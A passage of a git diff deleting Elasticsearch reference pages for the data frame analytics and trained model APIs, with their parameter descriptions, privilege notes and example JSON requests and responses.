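-model predicts the dependent variable with the evaluate {dfanalytics} API. The
-request below is a sketch rather than part of the original example; it assumes
-the job ran with the default `results_field` of `ml`, so that the predictions
-are stored in `ml.G3_prediction` and the `ml.is_training` flag marks documents
-that were held out from training:
-
-[source,console]
---------------------------------------------------
-POST _ml/data_frame/_evaluate
-{
-  "index": "student_performance_mathematics_reg",
-  "query": {
-    "term": { "ml.is_training": { "value": false } } <1>
-  },
-  "evaluation": {
-    "regression": {
-      "actual_field": "G3",
-      "predicted_field": "ml.G3_prediction",
-      "metrics": {
-        "r_squared": {},
-        "mse": {}
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[skip:TBD]
-
-<1> Restricts the evaluation to documents that were not used for training.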
- -The following example uses custom feature processors to transform the -categorical values for `DestWeather` into numerical values using one-hot, -target-mean, and frequency encoding techniques: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/flight_prices -{ - "source": { - "index": [ - "kibana_sample_data_flights" - ] - }, - "dest": { - "index": "kibana_sample_flight_prices" - }, - "analysis": { - "regression": { - "dependent_variable": "AvgTicketPrice", - "num_top_feature_importance_values": 2, - "feature_processors": [ - { - "frequency_encoding": { - "field": "DestWeather", - "feature_name": "DestWeather_frequency", - "frequency_map": { - "Rain": 0.14604811155570188, - "Heavy Fog": 0.14604811155570188, - "Thunder & Lightning": 0.14604811155570188, - "Cloudy": 0.14604811155570188, - "Damaging Wind": 0.14604811155570188, - "Hail": 0.14604811155570188, - "Sunny": 0.14604811155570188, - "Clear": 0.14604811155570188 - } - } - }, - { - "target_mean_encoding": { - "field": "DestWeather", - "feature_name": "DestWeather_targetmean", - "target_map": { - "Rain": 626.5588814585794, - "Heavy Fog": 626.5588814585794, - "Thunder & Lightning": 626.5588814585794, - "Hail": 626.5588814585794, - "Damaging Wind": 626.5588814585794, - "Cloudy": 626.5588814585794, - "Clear": 626.5588814585794, - "Sunny": 626.5588814585794 - }, - "default_value": 624.0249512020454 - } - }, - { - "one_hot_encoding": { - "field": "DestWeather", - "hot_map": { - "Rain": "DestWeather_Rain", - "Heavy Fog": "DestWeather_Heavy Fog", - "Thunder & Lightning": "DestWeather_Thunder & Lightning", - "Cloudy": "DestWeather_Cloudy", - "Damaging Wind": "DestWeather_Damaging Wind", - "Hail": "DestWeather_Hail", - "Clear": "DestWeather_Clear", - "Sunny": "DestWeather_Sunny" - } - } - } - ] - } - }, - "analyzed_fields": { - "includes": [ - "AvgTicketPrice", - "Cancelled", - "DestWeather", - "FlightDelayMin", - "DistanceMiles" - ] - }, - "model_memory_limit": "30mb" -} --------------------------------------------------- -// TEST[skip:TBD] - -NOTE: These custom feature processors are optional; automatic -{ml-docs}/ml-feature-encoding.html[feature encoding] still occurs for all -categorical features. - -[[ml-put-dfanalytics-example-c]] -=== {classification-cap} example - -The following example creates the `loan_classification` {dfanalytics-job}, the -analysis type is `classification`: - -[source,console] --------------------------------------------------- -PUT _ml/data_frame/analytics/loan_classification -{ - "source" : { - "index": "loan-applicants" - }, - "dest" : { - "index": "loan-applicants-classified" - }, - "analysis" : { - "classification": { - "dependent_variable": "label", - "training_percent": 75, - "num_top_classes": 2 - } - } -} --------------------------------------------------- -// TEST[skip:TBD] diff --git a/docs/reference/ml/df-analytics/apis/put-trained-models.asciidoc b/docs/reference/ml/df-analytics/apis/put-trained-models.asciidoc deleted file mode 100644 index ecf0537d242..00000000000 --- a/docs/reference/ml/df-analytics/apis/put-trained-models.asciidoc +++ /dev/null @@ -1,664 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[put-trained-models]] -= Create trained models API -[subs="attributes"] -++++ -Create trained models -++++ - -Creates a trained model. - -WARNING: Models created in version 7.8.0 are not backwards compatible - with older node versions. If in a mixed cluster environment, - all nodes must be at least 7.8.0 to use a model stored by - a 7.8.0 node. 
- - -experimental[] - - -[[ml-put-trained-models-request]] -== {api-request-title} - -`PUT _ml/trained_models/` - - -[[ml-put-trained-models-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-put-trained-models-desc]] -== {api-description-title} - -The create trained model API enables you to supply a trained model that is not -created by {dfanalytics}. - - -[[ml-put-trained-models-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - -[role="child_attributes"] -[[ml-put-trained-models-request-body]] -== {api-request-body-title} - -`compressed_definition`:: -(Required, string) -The compressed (GZipped and Base64 encoded) {infer} definition of the model. -If `compressed_definition` is specified, then `definition` cannot be specified. - -//Begin definition -`definition`:: -(Required, object) -The {infer} definition for the model. If `definition` is specified, then -`compressed_definition` cannot be specified. -+ -.Properties of `definition` -[%collapsible%open] -==== -//Begin preprocessors -`preprocessors`:: -(Optional, object) -Collection of preprocessors. See <>. -+ -.Properties of `preprocessors` -[%collapsible%open] -===== -//Begin frequency encoding -`frequency_encoding`:: -(Required, object) -Defines a frequency encoding for a field. -+ -.Properties of `frequency_encoding` -[%collapsible%open] -====== -`feature_name`:: -(Required, string) -The name of the resulting feature. - -`field`:: -(Required, string) -The field name to encode. - -`frequency_map`:: -(Required, object map of string:double) -Object that maps the field value to the frequency encoded value. - -`custom`:: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-preprocessor] - -====== -//End frequency encoding - -//Begin one hot encoding -`one_hot_encoding`:: -(Required, object) -Defines a one hot encoding map for a field. -+ -.Properties of `one_hot_encoding` -[%collapsible%open] -====== -`field`:: -(Required, string) -The field name to encode. - -`hot_map`:: -(Required, object map of strings) -String map of "field_value: one_hot_column_name". - -`custom`:: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-preprocessor] - -====== -//End one hot encoding - -//Begin target mean encoding -`target_mean_encoding`:: -(Required, object) -Defines a target mean encoding for a field. -+ -.Properties of `target_mean_encoding` -[%collapsible%open] -====== -`default_value`::: -(Required, double) -The feature value if the field value is not in the `target_map`. - -`feature_name`::: -(Required, string) -The name of the resulting feature. - -`field`::: -(Required, string) -The field name to encode. - -`target_map`::: -(Required, object map of string:double) -Object that maps the field value to the target mean value. - -`custom`:: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-preprocessor] - -====== -//End target mean encoding -===== -//End preprocessors - -//Begin trained model -`trained_model`:: -(Required, object) -The definition of the trained model. -+ -.Properties of `trained_model` -[%collapsible%open] -===== -//Begin tree -`tree`:: -(Required, object) -The definition for a binary decision tree. 
-+ -.Properties of `tree` -[%collapsible%open] -====== -`classification_labels`::: -(Optional, string) An array of classification labels (used for -`classification`). - -`feature_names`::: -(Required, string) -Features expected by the tree, in their expected order. - -`target_type`::: -(Required, string) -String indicating the model target type; `regression` or `classification`. - -`tree_structure`::: -(Required, object) -An array of `tree_node` objects. The nodes must be in ordinal order by their -`tree_node.node_index` value. -====== -//End tree - -//Begin tree node -`tree_node`:: -(Required, object) -The definition of a node in a tree. -+ --- -There are two major types of nodes: leaf nodes and not-leaf nodes. - -* Leaf nodes only need `node_index` and `leaf_value` defined. -* All other nodes need `split_feature`, `left_child`, `right_child`, - `threshold`, `decision_type`, and `default_left` defined. --- -+ -.Properties of `tree_node` -[%collapsible%open] -====== -`decision_type`:: -(Optional, string) -Indicates the positive value (in other words, when to choose the left node) -decision type. Supported `lt`, `lte`, `gt`, `gte`. Defaults to `lte`. - -`default_left`:: -(Optional, Boolean) -Indicates whether to default to the left when the feature is missing. Defaults -to `true`. - -`leaf_value`:: -(Optional, double) -The leaf value of the of the node, if the value is a leaf (in other words, no -children). - -`left_child`:: -(Optional, integer) -The index of the left child. - -`node_index`:: -(Integer) -The index of the current node. - -`right_child`:: -(Optional, integer) -The index of the right child. - -`split_feature`:: -(Optional, integer) -The index of the feature value in the feature array. - -`split_gain`:: -(Optional, double) The information gain from the split. - -`threshold`:: -(Optional, double) -The decision threshold with which to compare the feature value. -====== -//End tree node - -//Begin ensemble -`ensemble`:: -(Optional, object) -The definition for an ensemble model. See <>. -+ -.Properties of `ensemble` -[%collapsible%open] -====== -//Begin aggregate output -`aggregate_output`:: -(Required, object) -An aggregated output object that defines how to aggregate the outputs of the -`trained_models`. Supported objects are `weighted_mode`, `weighted_sum`, and -`logistic_regression`. See <>. -+ -.Properties of `aggregate_output` -[%collapsible%open] -======= -//Begin logistic regression -`logistic_regression`:: -(Optional, object) -This `aggregated_output` type works with binary classification (classification -for values [0, 1]). It multiplies the outputs (in the case of the `ensemble` -model, the inference model values) by the supplied `weights`. The resulting -vector is summed and passed to a -{wikipedia}/Sigmoid_function[`sigmoid` function]. The result -of the `sigmoid` function is considered the probability of class 1 (`P_1`), -consequently, the probability of class 0 is `1 - P_1`. The class with the -highest probability (either 0 or 1) is then returned. For more information about -logistic regression, see -{wikipedia}/Logistic_regression[this wiki article]. -+ -.Properties of `logistic_regression` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End logistic regression - -//Begin weighted sum -`weighted_sum`:: -(Optional, object) -This `aggregated_output` type works with regression. The weighted sum of the -input values. 
-+ -.Properties of `weighted_sum` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End weighted sum - -//Begin weighted mode -`weighted_mode`:: -(Optional, object) -This `aggregated_output` type works with regression or classification. It takes -a weighted vote of the input values. The most common input value (taking the -weights into account) is returned. -+ -.Properties of `weighted_mode` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End weighted mode - -//Begin exponent -`exponent`:: -(Optional, object) -This `aggregated_output` type works with regression. It takes a weighted sum of -the input values and passes the result to an exponent function -(`e^x` where `x` is the sum of the weighted values). -+ -.Properties of `exponent` -[%collapsible%open] -======== -`weights`::: -(Required, double) -The weights to multiply by the input values (the inference values of the trained -models). -======== -//End exponent -======= -//End aggregate output - -`classification_labels`:: -(Optional, string) -An array of classification labels. - -`feature_names`:: -(Optional, string) -Features expected by the ensemble, in their expected order. - -`target_type`:: -(Required, string) -String indicating the model target type; `regression` or `classification.` - -`trained_models`:: -(Required, object) -An array of `trained_model` objects. Supported trained models are `tree` and -`ensemble`. -====== -//End ensemble - -===== -//End trained model - -==== -//End definition - -`description`:: -(Optional, string) -A human-readable description of the {infer} trained model. - -//Begin inference_config -`inference_config`:: -(Required, object) -The default configuration for inference. This can be either a `regression` -or `classification` configuration. It must match the underlying -`definition.trained_model`'s `target_type`. -+ -.Properties of `inference_config` -[%collapsible%open] -==== -`regression`::: -(Optional, object) -Regression configuration for inference. -+ -.Properties of regression inference -[%collapsible%open] -===== -`num_top_feature_importance_values`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - -`results_field`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] -===== - -`classification`::: -(Optional, object) -Classification configuration for inference. 
-+ -.Properties of classification inference -[%collapsible%open] -===== -`num_top_classes`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`:::: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`prediction_field_type`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - -`results_field`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field] - -`top_classes_results_field`:::: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-top-classes-results-field] -===== -==== -//End of inference_config - -//Begin input -`input`:: -(Required, object) -The input field names for the model definition. -+ -.Properties of `input` -[%collapsible%open] -==== -`field_names`::: -(Required, string) -An array of input field names for the model. -==== -//End input - -`metadata`:: -(Optional, object) -An object map that contains metadata about the model. - -`tags`:: -(Optional, string) -An array of tags to organize the model. - - -[[ml-put-trained-models-example]] -== {api-examples-title} - -[[ml-put-trained-models-preprocessor-example]] -=== Preprocessor examples - -The example below shows a `frequency_encoding` preprocessor object: - -[source,js] ----------------------------------- -{ - "frequency_encoding":{ - "field":"FlightDelayType", - "feature_name":"FlightDelayType_frequency", - "frequency_map":{ - "Carrier Delay":0.6007414737092798, - "NAS Delay":0.6007414737092798, - "Weather Delay":0.024573576178086153, - "Security Delay":0.02476631010889467, - "No Delay":0.6007414737092798, - "Late Aircraft Delay":0.6007414737092798 - } - } -} ----------------------------------- -//NOTCONSOLE - - -The next example shows a `one_hot_encoding` preprocessor object: - -[source,js] ----------------------------------- -{ - "one_hot_encoding":{ - "field":"FlightDelayType", - "hot_map":{ - "Carrier Delay":"FlightDelayType_Carrier Delay", - "NAS Delay":"FlightDelayType_NAS Delay", - "No Delay":"FlightDelayType_No Delay", - "Late Aircraft Delay":"FlightDelayType_Late Aircraft Delay" - } - } -} ----------------------------------- -//NOTCONSOLE - - -This example shows a `target_mean_encoding` preprocessor object: - -[source,js] ----------------------------------- -{ - "target_mean_encoding":{ - "field":"FlightDelayType", - "feature_name":"FlightDelayType_targetmean", - "target_map":{ - "Carrier Delay":39.97465788139886, - "NAS Delay":39.97465788139886, - "Security Delay":203.171206225681, - "Weather Delay":187.64705882352948, - "No Delay":39.97465788139886, - "Late Aircraft Delay":39.97465788139886 - }, - "default_value":158.17995752420433 - } -} ----------------------------------- -//NOTCONSOLE - - -[[ml-put-trained-models-model-example]] -=== Model examples - -The first example shows a `trained_model` object: - -[source,js] ----------------------------------- -{ - "tree":{ - "feature_names":[ - "DistanceKilometers", - "FlightTimeMin", - "FlightDelayType_NAS Delay", - "Origin_targetmean", - "DestRegion_targetmean", - "DestCityName_targetmean", - "OriginAirportID_targetmean", - "OriginCityName_frequency", - "DistanceMiles", - "FlightDelayType_Late Aircraft Delay" - ], - "tree_structure":[ - { - "decision_type":"lt", - "threshold":9069.33437193022, - 
"split_feature":0, - "split_gain":4112.094574306927, - "node_index":0, - "default_left":true, - "left_child":1, - "right_child":2 - }, - ... - { - "node_index":9, - "leaf_value":-27.68987349695448 - }, - ... - ], - "target_type":"regression" - } -} ----------------------------------- -//NOTCONSOLE - - -The following example shows an `ensemble` model object: - -[source,js] ----------------------------------- -"ensemble":{ - "feature_names":[ - ... - ], - "trained_models":[ - { - "tree":{ - "feature_names":[], - "tree_structure":[ - { - "decision_type":"lte", - "node_index":0, - "leaf_value":47.64069875778043, - "default_left":false - } - ], - "target_type":"regression" - } - }, - ... - ], - "aggregate_output":{ - "weighted_sum":{ - "weights":[ - ... - ] - } - }, - "target_type":"regression" -} ----------------------------------- -//NOTCONSOLE - - -[[ml-put-trained-models-aggregated-output-example]] -=== Aggregated output example - -Example of a `logistic_regression` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "logistic_regression" : { - "weights" : [2.0, 1.0, .5, -1.0, 5.0, 1.0, 1.0] - } -} ----------------------------------- -//NOTCONSOLE - - -Example of a `weighted_sum` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "weighted_sum" : { - "weights" : [1.0, -1.0, .5, 1.0, 5.0] - } -} ----------------------------------- -//NOTCONSOLE - - -Example of a `weighted_mode` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "weighted_mode" : { - "weights" : [1.0, 1.0, 1.0, 1.0, 1.0] - } -} ----------------------------------- -//NOTCONSOLE - - -Example of an `exponent` object: - -[source,js] ----------------------------------- -"aggregate_output" : { - "exponent" : { - "weights" : [1.0, 1.0, 1.0, 1.0, 1.0] - } -} ----------------------------------- -//NOTCONSOLE - - -[[ml-put-trained-models-json-schema]] -=== Trained models JSON schema - -For the full JSON schema of trained models, -https://github.com/elastic/ml-json-schemas[click here]. diff --git a/docs/reference/ml/df-analytics/apis/start-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/start-dfanalytics.asciidoc deleted file mode 100644 index 8536e6c356f..00000000000 --- a/docs/reference/ml/df-analytics/apis/start-dfanalytics.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[start-dfanalytics]] -= Start {dfanalytics-jobs} API - -[subs="attributes"] -++++ -Start {dfanalytics-jobs} -++++ - -Starts a {dfanalytics-job}. - -experimental[] - -[[ml-start-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/analytics//_start` - -[[ml-start-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles and privileges: - -* `machine_learning_admin` -* source indices: `read`, `view_index_metadata` -* destination index: `read`, `create_index`, `manage` and `index` - -For more information, see <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-start-dfanalytics-desc]] -== {api-description-title} - -A {dfanalytics-job} can be started and stopped multiple times throughout its -lifecycle. - -If the destination index does not exist, it is created automatically the first -time you start the {dfanalytics-job}. The `index.number_of_shards` and -`index.number_of_replicas` settings for the destination index are copied from -the source index. 
If there are multiple source indices, the destination index -copies the highest setting values. The mappings for the destination index are -also copied from the source indices. If there are any mapping conflicts, the job -fails to start. - -If the destination index exists, it is used as is. You can therefore set up the -destination index in advance with custom settings and mappings. - -IMPORTANT: When {es} {security-features} are enabled, the {dfanalytics-job} -remembers which user created it and runs the job using those credentials. If you -provided <> -when you created the job, those credentials are used. - -[[ml-start-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[[ml-start-dfanalytics-query-params]] -== {api-query-parms-title} - -`timeout`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timeout-start] - -[[ml-start-dfanalytics-response-body]] -== {api-response-body-title} - -`acknowledged`:: - (Boolean) For a successful response, this value is always `true`. On failure, an - exception is returned instead. - -`node`:: - (string) The ID of the node that the job was started on. - If the job is allowed to open lazily and has not yet been assigned to a node, this value is an empty string. - -[[ml-start-dfanalytics-example]] -== {api-examples-title} - -The following example starts the `loganalytics` {dfanalytics-job}: - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/loganalytics/_start --------------------------------------------------- -// TEST[skip:setup:logdata_job] - -When the {dfanalytics-job} starts, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged" : true, - "node" : "node-1" -} ----- diff --git a/docs/reference/ml/df-analytics/apis/stop-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/stop-dfanalytics.asciidoc deleted file mode 100644 index 56dc7497e05..00000000000 --- a/docs/reference/ml/df-analytics/apis/stop-dfanalytics.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[stop-dfanalytics]] -= Stop {dfanalytics-jobs} API - -[subs="attributes"] -++++ -Stop {dfanalytics-jobs} -++++ - -Stops one or more {dfanalytics-jobs}. - -experimental[] - -[[ml-stop-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/analytics//_stop` + - -`POST _ml/data_frame/analytics/,/_stop` + - -`POST _ml/data_frame/analytics/_all/_stop` - -[[ml-stop-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-stop-dfanalytics-desc]] -== {api-description-title} - -A {dfanalytics-job} can be started and stopped multiple times throughout its -lifecycle. - -You can stop multiple {dfanalytics-jobs} in a single API request by using a -comma-separated list of {dfanalytics-jobs} or a wildcard expression. You can -stop all {dfanalytics-job} by using _all or by specifying * as the -. 
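-
-For example, the following request stops all {dfanalytics-jobs} in the cluster
-with a single call:
-
-[source,console]
---------------------------------------------------
-POST _ml/data_frame/analytics/_all/_stop
---------------------------------------------------
-// TEST[skip:TBD]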
- -[[ml-stop-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[[ml-stop-dfanalytics-query-params]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-match] - - -`force`:: - (Optional, Boolean) If true, the {dfanalytics-job} is stopped forcefully. - -`timeout`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timeout-stop] - - -[[ml-stop-dfanalytics-example]] -== {api-examples-title} - -The following example stops the `loganalytics` {dfanalytics-job}: - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/loganalytics/_stop --------------------------------------------------- -// TEST[skip:TBD] - -When the {dfanalytics-job} stops, you receive the following results: - -[source,console-result] ----- -{ - "stopped" : true -} ----- diff --git a/docs/reference/ml/df-analytics/apis/update-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/update-dfanalytics.asciidoc deleted file mode 100644 index 1de505f06ae..00000000000 --- a/docs/reference/ml/df-analytics/apis/update-dfanalytics.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[update-dfanalytics]] -= Update {dfanalytics-jobs} API -[subs="attributes"] -++++ -Update {dfanalytics-jobs} -++++ - -Updates an existing {dfanalytics-job}. - -experimental[] - -[[ml-update-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/analytics//_update` - - -[[ml-update-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -built-in roles and privileges: - -* `machine_learning_admin` -* source indices: `read`, `view_index_metadata` -* destination index: `read`, `create_index`, `manage` and `index` - -For more information, see <>, <>, and -{ml-docs-setup-privileges}. - -NOTE: The {dfanalytics-job} remembers which roles the user who updated it had at -the time of the update. When you start the job, it performs the analysis using -those same roles. If you provide -<>, -those credentials are used instead. - -[[ml-update-dfanalytics-desc]] -== {api-description-title} - -This API updates an existing {dfanalytics-job} that performs an analysis on the source -indices and stores the outcome in a destination index. - - -[[ml-update-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define] - -[role="child_attributes"] -[[ml-update-dfanalytics-request-body]] -== {api-request-body-title} - -`allow_lazy_start`:: -(Optional, Boolean) -Specifies whether this job can start when there is insufficient {ml} node -capacity for it to be immediately assigned to a node. The default is `false`; if -a {ml} node with capacity to run the job cannot immediately be found, the API -returns an error. However, this is also subject to the cluster-wide -`xpack.ml.max_lazy_ml_nodes` setting. See <>. If this -option is set to `true`, the API does not return an error and the job waits in -the `starting` state until sufficient {ml} node capacity is available. - -`description`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=description-dfa] - -`max_num_threads`:: -(Optional, integer) -The maximum number of threads to be used by the analysis. -The default value is `1`. 
Using more threads may decrease the time -necessary to complete the analysis at the cost of using more CPU. -Note that the process may use additional threads for operational -functionality other than the analysis itself. - -`model_memory_limit`:: -(Optional, string) -The approximate maximum amount of memory resources that are permitted for -analytical processing. The default value for {dfanalytics-jobs} is `1gb`. If -your `elasticsearch.yml` file contains an `xpack.ml.max_model_memory_limit` -setting, an error occurs when you try to create {dfanalytics-jobs} that have -`model_memory_limit` values greater than that setting. For more information, see -<>. - -[[ml-update-dfanalytics-example]] -== {api-examples-title} - -[[ml-update-dfanalytics-example-preprocess]] -=== Updating model memory limit example - -The following example shows how to update the model memory limit for the existing {dfanalytics} configuration. - -[source,console] --------------------------------------------------- -POST _ml/data_frame/analytics/model-flight-delays/_update -{ - "model_memory_limit": "200mb" -} --------------------------------------------------- -// TEST[skip:setup kibana sample data] diff --git a/docs/reference/ml/images/ml-category-advanced.jpg b/docs/reference/ml/images/ml-category-advanced.jpg deleted file mode 100644 index 0a862903c0b..00000000000 Binary files a/docs/reference/ml/images/ml-category-advanced.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-category-analyzer.jpg b/docs/reference/ml/images/ml-category-analyzer.jpg deleted file mode 100644 index e9c4842a0de..00000000000 Binary files a/docs/reference/ml/images/ml-category-analyzer.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-category-anomalies.jpg b/docs/reference/ml/images/ml-category-anomalies.jpg deleted file mode 100644 index fcbd0454886..00000000000 Binary files a/docs/reference/ml/images/ml-category-anomalies.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-category-wizard.jpg b/docs/reference/ml/images/ml-category-wizard.jpg deleted file mode 100644 index eb78a3d51b5..00000000000 Binary files a/docs/reference/ml/images/ml-category-wizard.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-create-job.jpg b/docs/reference/ml/images/ml-create-job.jpg deleted file mode 100644 index 506f3d8ea3c..00000000000 Binary files a/docs/reference/ml/images/ml-create-job.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-create-jobs.jpg b/docs/reference/ml/images/ml-create-jobs.jpg deleted file mode 100644 index 0c37ea2c9ff..00000000000 Binary files a/docs/reference/ml/images/ml-create-jobs.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-customurl-edit.gif b/docs/reference/ml/images/ml-customurl-edit.gif deleted file mode 100644 index e32312fb643..00000000000 Binary files a/docs/reference/ml/images/ml-customurl-edit.gif and /dev/null differ diff --git a/docs/reference/ml/images/ml-customurl.jpg b/docs/reference/ml/images/ml-customurl.jpg deleted file mode 100644 index 269b57acec3..00000000000 Binary files a/docs/reference/ml/images/ml-customurl.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-data-visualizer.jpg b/docs/reference/ml/images/ml-data-visualizer.jpg deleted file mode 100644 index 11758bab17b..00000000000 Binary files a/docs/reference/ml/images/ml-data-visualizer.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-edit-job.jpg b/docs/reference/ml/images/ml-edit-job.jpg deleted file mode 100644 index 
e6a3e6b1106..00000000000 Binary files a/docs/reference/ml/images/ml-edit-job.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-population-anomaly.png b/docs/reference/ml/images/ml-population-anomaly.png deleted file mode 100644 index e2a05733f50..00000000000 Binary files a/docs/reference/ml/images/ml-population-anomaly.png and /dev/null differ diff --git a/docs/reference/ml/images/ml-population-job.png b/docs/reference/ml/images/ml-population-job.png deleted file mode 100644 index bab15230214..00000000000 Binary files a/docs/reference/ml/images/ml-population-job.png and /dev/null differ diff --git a/docs/reference/ml/images/ml-population-results.png b/docs/reference/ml/images/ml-population-results.png deleted file mode 100644 index fcf842ea1d1..00000000000 Binary files a/docs/reference/ml/images/ml-population-results.png and /dev/null differ diff --git a/docs/reference/ml/images/ml-scriptfields.jpg b/docs/reference/ml/images/ml-scriptfields.jpg deleted file mode 100644 index 0c9150734c0..00000000000 Binary files a/docs/reference/ml/images/ml-scriptfields.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml-stop-feed.jpg b/docs/reference/ml/images/ml-stop-feed.jpg deleted file mode 100644 index 3bf3c64402b..00000000000 Binary files a/docs/reference/ml/images/ml-stop-feed.jpg and /dev/null differ diff --git a/docs/reference/ml/images/ml.jpg b/docs/reference/ml/images/ml.jpg deleted file mode 100644 index 12f427675a1..00000000000 Binary files a/docs/reference/ml/images/ml.jpg and /dev/null differ diff --git a/docs/reference/ml/ml-shared.asciidoc b/docs/reference/ml/ml-shared.asciidoc deleted file mode 100644 index 729321c21f3..00000000000 --- a/docs/reference/ml/ml-shared.asciidoc +++ /dev/null @@ -1,1521 +0,0 @@ -tag::aggregations[] -If set, the {dfeed} performs aggregation searches. Support for aggregations is -limited and should be used only with low cardinality data. For more information, -see -{ml-docs}/ml-configuring-aggregation.html[Aggregating data for faster performance]. -end::aggregations[] - -tag::allow-lazy-open[] -Advanced configuration option. Specifies whether this job can open when there is -insufficient {ml} node capacity for it to be immediately assigned to a node. The -default value is `false`; if a {ml} node with capacity to run the job cannot -immediately be found, the <> returns an -error. However, this is also subject to the cluster-wide -`xpack.ml.max_lazy_ml_nodes` setting; see <>. If this -option is set to `true`, the <> does not -return an error and the job waits in the `opening` state until sufficient {ml} -node capacity is available. -end::allow-lazy-open[] - -tag::allow-no-datafeeds[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {dfeeds} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `datafeeds` array when -there are no matches and the subset of results when there are partial matches. -If this parameter is `false`, the request returns a `404` status code when there -are no matches or only partial matches. --- -end::allow-no-datafeeds[] - -tag::allow-no-jobs[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no jobs that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. 
- -The default value is `true`, which returns an empty `jobs` array -when there are no matches and the subset of results when there are partial -matches. If this parameter is `false`, the request returns a `404` status code -when there are no matches or only partial matches. --- -end::allow-no-jobs[] - -tag::allow-no-match[] - Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {dfanalytics-jobs} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `data_frame_analytics` array -when there are no matches and the subset of results when there are partial -matches. If this parameter is `false`, the request returns a `404` status code -when there are no matches or only partial matches. --- -end::allow-no-match[] - -tag::allow-no-match-models[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no models that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty array when there are no -matches and the subset of results when there are partial matches. If this -parameter is `false`, the request returns a `404` status code when there are no -matches or only partial matches. --- -end::allow-no-match-models[] - -tag::analysis[] -Defines the type of 